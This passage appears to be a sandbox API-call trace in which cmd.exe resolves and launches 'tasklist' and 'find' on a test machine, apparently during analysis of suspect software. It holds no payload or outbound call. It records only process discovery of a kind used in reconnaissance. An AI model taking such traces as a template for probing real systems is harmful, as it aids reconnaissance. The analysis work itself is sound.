(_String1="tasklist", _String2="TIME") returned -8 [0106.679] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0106.679] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0106.679] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0106.679] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0106.679] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0106.679] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0106.679] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0106.679] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0106.679] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0106.679] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0106.679] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0106.679] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0106.679] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0106.679] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0106.679] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0106.679] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0106.679] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0106.679] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0106.679] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0106.679] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0106.679] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0106.679] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0106.679] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0106.679] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0106.679] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0106.679] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0106.679] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0106.679] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0106.679] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0106.679] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0106.679] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0106.679] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0106.679] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0106.679] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0106.679] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0106.679] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0106.679] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0106.679] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0106.679] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0106.679] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0106.679] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0106.679] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0106.679] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0106.679] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0106.679] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0106.679] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0106.679] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0106.679] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0106.679] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0106.679] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0106.679] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0106.679] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0106.679] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0106.679] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0106.680] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0106.680] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0106.680] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0106.680] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0106.680] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0106.680] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0106.680] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0106.680] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0106.680] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0106.680] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0106.680] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0106.680] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0106.680] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0106.680] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0106.680] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0106.680] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0106.680] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0106.680] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0106.680] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0106.680] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0106.680] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0106.680] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0106.680] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0106.680] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0106.680] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0106.680] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0106.680] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0106.680] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0106.680] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0106.680] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0106.680] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0106.680] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0106.680] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0106.680] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0106.680] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0106.680] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0106.680] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0106.680] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0106.680] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0106.680] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0106.680] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0106.680] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0106.680] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0106.681] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0106.681] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0106.681] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0106.681] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0106.681] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0106.681] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0106.681] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0106.681] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0106.681] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0106.681] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0106.681] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0106.681] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0106.681] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0106.681] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0106.681] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0106.681] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0106.681] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0106.681] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0106.681] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0106.681] SetErrorMode (uMode=0x0) returned 0x0 [0106.681] SetErrorMode (uMode=0x1) returned 0x0 [0106.681] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xea5228, lpFilePart=0xb6f524 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb6f524*="Desktop") returned 0x1c [0106.681] SetErrorMode (uMode=0x0) returned 0x1 [0106.681] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0106.681] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0106.685] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.686] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.686] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xb6f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f2b0) returned 0xffffffff [0106.686] GetLastError () returned 0x2 [0106.686] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.686] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xb6f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f2b0) returned 0xea5530 [0106.686] FindClose (in: hFindFile=0xea5530 | out: hFindFile=0xea5530) returned 1 [0106.686] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xb6f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f2b0) returned 0xffffffff [0106.686] GetLastError () returned 0x2 [0106.686] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xb6f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f2b0) returned 0xea5530 [0106.686] FindClose (in: hFindFile=0xea5530 | out: hFindFile=0xea5530) returned 1 [0106.686] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0106.686] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0106.686] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0106.686] SetErrorMode (uMode=0x0) returned 0x0 [0106.687] SetErrorMode (uMode=0x1) returned 0x0 [0106.687] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xeaa3c0, lpFilePart=0xb6f2cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb6f2cc*="Desktop") returned 0x1c [0106.687] SetErrorMode (uMode=0x0) returned 0x1 [0106.687] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0106.687] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0106.687] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.687] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xb6f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f058) returned 0xffffffff [0106.687] GetLastError () returned 0x2 [0106.687] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.*", fInfoLevelId=0x1, lpFindFileData=0xb6f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f058) returned 0xea5628 [0106.687] FindClose (in: hFindFile=0xea5628 | out: hFindFile=0xea5628) returned 1 [0106.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.COM", fInfoLevelId=0x1, lpFindFileData=0xb6f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f058) returned 0xffffffff [0106.687] GetLastError () returned 0x2 [0106.687] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\tasklist.EXE", fInfoLevelId=0x1, lpFindFileData=0xb6f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f058) returned 0xea5628 [0106.687] FindClose (in: hFindFile=0xea5628 | out: hFindFile=0xea5628) returned 1 [0106.687] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0106.687] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0106.687] GetConsoleTitleW (in: lpConsoleTitle=0xb6f554, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0106.688] InitializeProcThreadAttributeList (in: lpAttributeList=0xb6f480, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xb6f464 | out: lpAttributeList=0xb6f480, lpSize=0xb6f464) returned 1 [0106.688] UpdateProcThreadAttribute (in: lpAttributeList=0xb6f480, dwFlags=0x0, Attribute=0x60001, lpValue=0xb6f46c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xb6f480, lpPreviousValue=0x0) returned 1 [0106.688] GetStartupInfoW (in: lpStartupInfo=0xb6f4b8 | out: lpStartupInfo=0xb6f4b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x158, hStdError=0x2c)) [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0106.688] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0106.689] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0106.689] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0106.689] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0106.689] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0106.689] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.689] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0106.689] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0106.689] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0106.689] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0106.689] lstrcmpW (lpString1="\\tasklist.exe", lpString2="\\XCOPY.EXE") returned -1 [0106.690] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\tasklist.exe", lpCommandLine="tasklist", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xb6f408*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="tasklist", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xb6f454 | out: lpCommandLine="tasklist", lpProcessInformation=0xb6f454*(hProcess=0x64, hThread=0x60, dwProcessId=0x834, dwThreadId=0x4c4)) returned 1 [0106.693] CloseHandle (hObject=0x60) returned 1 [0106.693] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0106.693] GetEnvironmentStringsW () returned 0xea42d8* [0106.693] FreeEnvironmentStringsA (penv="=") returned 1 [0106.693] DeleteProcThreadAttributeList (in: lpAttributeList=0xb6f480 | out: lpAttributeList=0xb6f480) [0106.693] _get_osfhandle (_FileHandle=3) returned 0x54 [0106.693] DuplicateHandle (in: hSourceProcessHandle=0x64, hSourceHandle=0x54, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0106.693] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0106.693] _close (_FileHandle=5) returned 0 [0106.693] _dup (_FileHandle=0) returned 4 [0106.693] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0106.693] _close (_FileHandle=3) returned 0 [0106.694] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0106.694] SetErrorMode (uMode=0x0) returned 0x0 [0106.694] SetErrorMode (uMode=0x1) returned 0x0 [0106.694] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xea42e0, lpFilePart=0xb6f524 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb6f524*="Desktop") returned 0x1c [0106.694] SetErrorMode (uMode=0x0) returned 0x1 [0106.694] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0106.694] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0106.694] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.694] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xb6f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f2b0) returned 0xffffffff [0106.694] GetLastError () returned 0x2 [0106.694] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xb6f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f2b0) returned 0xea5628 [0106.694] FindClose (in: hFindFile=0xea5628 | out: hFindFile=0xea5628) returned 1 [0106.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xb6f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f2b0) returned 0xffffffff [0106.694] GetLastError () returned 0x2 [0106.694] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xb6f2b0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f2b0) returned 0xea5628 [0106.695] FindClose (in: hFindFile=0xea5628 | out: hFindFile=0xea5628) returned 1 [0106.695] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0106.695] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0106.695] _wcsnicmp (_String1="find", _String2="cmd ", _MaxCount=0x4) returned 3 [0106.695] SetErrorMode (uMode=0x0) returned 0x0 [0106.695] SetErrorMode (uMode=0x1) returned 0x0 [0106.695] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xea4668, lpFilePart=0xb6f2cc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xb6f2cc*="Desktop") returned 0x1c [0106.695] SetErrorMode (uMode=0x0) returned 0x1 [0106.695] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0106.695] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0106.695] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0106.695] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.695] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\find.*", fInfoLevelId=0x1, lpFindFileData=0xb6f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f058) returned 0xffffffff [0106.695] GetLastError () returned 0x2 [0106.695] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0106.695] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.*", fInfoLevelId=0x1, lpFindFileData=0xb6f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f058) returned 0xea04a0 [0106.696] FindClose (in: hFindFile=0xea04a0 | out: hFindFile=0xea04a0) returned 1 [0106.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.COM", fInfoLevelId=0x1, lpFindFileData=0xb6f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f058) returned 0xffffffff [0106.696] GetLastError () returned 0x2 [0106.696] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\find.EXE", fInfoLevelId=0x1, lpFindFileData=0xb6f058, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xb6f058) returned 0xea04a0 [0106.696] FindClose (in: hFindFile=0xea04a0 | out: hFindFile=0xea04a0) returned 1 [0106.696] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0106.696] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0106.696] GetConsoleTitleW (in: lpConsoleTitle=0xb6f554, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0106.696] InitializeProcThreadAttributeList (in: lpAttributeList=0xb6f480, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xb6f464 | out: lpAttributeList=0xb6f480, lpSize=0xb6f464) returned 1 [0106.696] UpdateProcThreadAttribute (in: lpAttributeList=0xb6f480, dwFlags=0x0, Attribute=0x60001, lpValue=0xb6f46c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xb6f480, lpPreviousValue=0x0) returned 1 [0106.696] GetStartupInfoW (in: lpStartupInfo=0xb6f4b8 | out: lpStartupInfo=0xb6f4b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x24, hStdOutput=0x158, hStdError=0x2c)) [0106.696] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0106.696] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0106.696] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0106.696] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0106.696] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0106.696] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.696] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.696] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0106.697] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0106.697] _wcsnicmp 